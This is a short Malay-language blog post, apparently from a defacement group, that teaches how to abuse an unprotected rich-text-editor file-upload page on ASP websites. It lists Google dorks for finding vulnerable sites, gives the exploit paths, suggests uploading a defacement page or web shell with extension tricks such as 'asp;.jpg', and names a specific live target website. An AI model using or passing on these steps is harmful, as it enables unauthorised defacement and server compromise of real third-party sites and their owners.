Thursday, 12 January 2012

RTE - Remote File Upload



Assalamualaikum...lama tak post entry baru.huhu...sorry bz skolah...ok jom mula.malas nk tulis pnjang2.

1. Search google salah 1 dork ni :

  • inurl:rte/my_documents/my_files 
  • inurl:/my_documents/my_files/
Pilih salah satu website.

2. Masukkan exploit dibawah di hujung url :

Exploit: 

http://www.website.com/rte/RTE_popup_file_atch.asp
Atau
http://www.website.com/admin/RTE_popup_file_atch.asp

3. Tekan enter.dan korang akan dapat lebih kurang macam ni :

Tekan Choose File untuk pilih file korang.Lepas tu tekan Upload untuk Upload!!!Link hasil korang akan terpapar di dalam kotak File Url.

Akhir sekali upload deface korang.korang bole try upload shell dengan format asp;.jpg atau php;,jpg

4. Seletah berjaya upload korang akan nampak link deface/shell korang tu.

Contoh :
File URL:

Link korang tu akan ada dalam kotak ni.

Itu saja.Mudah kan??selamat berjaya!

Live Targets :
http://www.jrf.org.tw/newjrf/rte/RTE_popup_file_atch.asp 

Semoga bertemu lagi.Assalamualaikum...

Item Reviewed: RTE - Remote File Upload Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com